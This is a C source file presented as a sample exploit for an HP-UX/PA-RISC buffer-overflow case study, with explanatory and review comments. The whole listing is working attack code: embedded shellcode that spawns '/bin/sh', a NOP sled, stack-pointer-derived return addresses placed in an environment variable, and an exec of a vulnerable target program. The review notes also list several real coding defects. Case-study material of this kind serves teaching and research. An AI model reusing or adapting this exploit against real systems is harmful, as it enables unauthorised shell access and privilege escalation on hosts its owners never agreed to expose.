/*
* Sample exploit for HP-UX buffer overflows case study
*/
#include <stdio.h>
#include <unistd.h>
/* Payload bytes appended verbatim by strcat() in main(); the byte string
 * ends with the text "/bin/shA".  Byte values are PA-RISC specific and are
 * not explained on this page. */
char shellcode[]=
"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
/* Defaults for the command-line options parsed in main(); each one can be
 * overridden at run time (see the getopt switch there). */
#define BUFFER_SIZE 180           /* default buf_size (-b) */
#define STACK_DSO -84             /* default dso (-d): subtracted from get_sp() when no -r is given */
#define NOP 0x0b390280            /* filler word written big-endian, one byte at a time, in the "nops" loop */
#define PAD 0                     /* default padd (-p): number of trailing 'B' bytes */
#define ALIGN 8                   /* default align (-a): number of leading 'A' bytes */
#define ADB_PATH "/usr/bin/adb"   /* debugger exec'd instead of ./vuln when -D is given */
#define VULNVAR "VULNBUF="        /* environment-variable name (with '=') the buffer is placed under */
#define MORE 1                    /* default count of return-address copies; -m adds to it */
/*
 * Returns the current stack pointer.
 *
 * PA-RISC only: the inline asm copies %sp into %ret0, the register the
 * PA-RISC calling convention uses for an integer return value.  There is no
 * C-level return statement, so the function relies on the compiler leaving
 * %ret0 untouched after the asm -- a non-void function falling off its end
 * is undefined behavior in standard C, and this will not build for any other
 * architecture.  Called twice in main(): once for a diagnostic print and once
 * to derive the default return address.
 */
unsigned long get_sp(void)
{
__asm__("copy %sp,%ret0 \n"); /* %sp -> %ret0 (return-value register) */
}
/*
 * Builds one environment-variable string, VULNVAR followed by a byte layout
 * taken from the command-line options, places it in the environment and then
 * exec()s a target program.  Written for HP-UX/PA-RISC; get_sp() and the
 * default constants are not portable.
 *
 * Layout written into buf, in order:
 *   VULNVAR prefix | align x 'A' | NOP words | shellcode | padd x 'B' |
 *   more x retaddr (big-endian, 4 bytes each)
 *
 * Options (getopt, see the switch below):
 *   -b n  buf_size, size budget for the 'A'/NOP/shellcode/'B' section
 *   -d n  dso, subtracted from get_sp() when -r is not given
 *   -r x  retaddr; 0 (the default) means "derive it from get_sp()"
 *   -a n  align, number of leading 'A' bytes
 *   -p n  padd, number of trailing 'B' bytes
 *   -m n  added to more, the number of retaddr copies appended
 *   -D    exec ADB_PATH instead of ./vuln
 * Numeric options go through strtol/strtoul with base 0, so hex input works.
 *
 * NOTE(review): known defects visible in this listing, left as-is here:
 *   - none of <stdlib.h>/<string.h> is included, so strtol, calloc, exit,
 *     putenv, strcpy, strcat and strlen are all implicitly declared;
 *   - `adb` is never initialized and is read at the end unless -D was given;
 *   - the option string names an 'o' option that no case handles;
 *   - several fprintf format specifiers do not match their argument types.
 * Returns 0 only if the exec fails (exec replaces the process on success).
 */
int main(int argc, char **argv) {
int i, dso, align, padd, buf_size, adb, more; /* NOTE(review): adb has no initializer */
char *buf, *ptr;
unsigned long retaddr;
/* defaults come from the macros at the top of the file */
dso = STACK_DSO;
align = ALIGN;
padd = PAD;
buf_size = BUFFER_SIZE;
retaddr = 0; /* 0 = "not given", resolved after option parsing */
more = MORE;
/* getopt returns -1 at the end of the options; comparing with EOF works only
 * because EOF is -1 on this platform */
while ((i = getopt(argc, argv,
"Dd:b:r:o:a:p:m:")) != EOF) { /* NOTE(review): 'o:' is accepted but never handled */
switch (i) {
case 'd':
dso=(int) strtol(optarg, NULL, 0);
break;
case 'm':
more+=(int) strtol(optarg, NULL, 0); /* added to, not assigned */
break;
case 'b':
buf_size=(int)strtol(optarg, NULL, 0);
break;
case 'r':
retaddr = strtoul(optarg, NULL, 0);
break;
case 'a':
align = (int) strtol(optarg, NULL, 0);
break;
case 'p':
padd = (int) strtol(optarg, NULL, 0);
break;
case 'D':
adb = 1; /* the only assignment to adb */
break;
default: /* unknown option, missing argument, or the unhandled 'o' */
fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
"[-r return_address]"
"[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
exit(1);
break;
}
}
/* Zeroed allocation sized for: prefix + buf_size + one word per retaddr
 * copy + terminating NUL.  calloc's zero fill is what keeps buf a valid C
 * string for the strcat() below.  ptr is assigned before the NULL check but
 * not dereferenced until after it. */
buf=(char *)calloc(strlen(VULNVAR) + buf_size
+ sizeof(unsigned long)*more + 1, 1);
ptr=buf;
if (!buf) {
perror("calloc");
exit(1);
}
/* NOTE(review): %X expects unsigned int, get_sp() returns unsigned long */
fprintf(stderr,"our stack %X\n",get_sp());
/* derive the return address from the current stack pointer when -r was not
 * given; the "+ 3" offset is not explained on this page */
if (!retaddr)
retaddr=get_sp()- dso + 3;
/* NOTE(review): retaddr is unsigned long printed with %X */
fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
" buf_len: %i dso: %i more: %i\n",
retaddr, padd, align, buf_size, dso, more);
/* prefix: the variable name plus '=' */
strcpy(buf, VULNVAR);
ptr+=strlen(VULNVAR); /* ptr tracks the write position from here on */
for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
/* NOTE(review): strlen() makes this whole expression size_t; if buf_size is
 * smaller than strlen(shellcode)+align+padd the subtraction wraps to a huge
 * count and the loop writes far past buf. */
for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
/* one 32-bit NOP word, most significant byte first */
*ptr++=(NOP>>24)&0xff;
*ptr++=(NOP>>16)&0xff;
*ptr++=(NOP>>8)&0xff;
*ptr++=(NOP)&0xff;
}
/* strcat finds the NUL left by calloc right where ptr points (no NUL was
 * written by the loops above); ptr is advanced by hand to stay in step */
strcat(buf, shellcode); // append shellcode
ptr+=strlen(shellcode);
for(i=0;i<padd; i++) *ptr++='B'; // padd
/* 'more' big-endian copies of the return address */
for (i=0;i<more ; i++) {
*ptr++=(retaddr>>24)&0xff;
*ptr++=(retaddr>>16)&0xff;
*ptr++=(retaddr>>8)&0xff;
*ptr++=(retaddr)&0xff;
}
/* NOTE(review): strlen() returns size_t, printed with %i */
fprintf(stderr,"buflen is %i\n", strlen(buf));
/* NOTE(review): putenv() takes a single argument; the second one is wrong
 * and only compiles because the function is implicitly declared */
putenv(buf,1);
/* with -D the buffer reaches the target only through the environment;
 * otherwise it is also passed as argv[1] */
if (adb)
execl(ADB_PATH,"adb","vuln", NULL);
else
execl("./vuln","vuln",buf, NULL);
/* reached only if execl() failed */
perror("execl");
return 0; // uff
}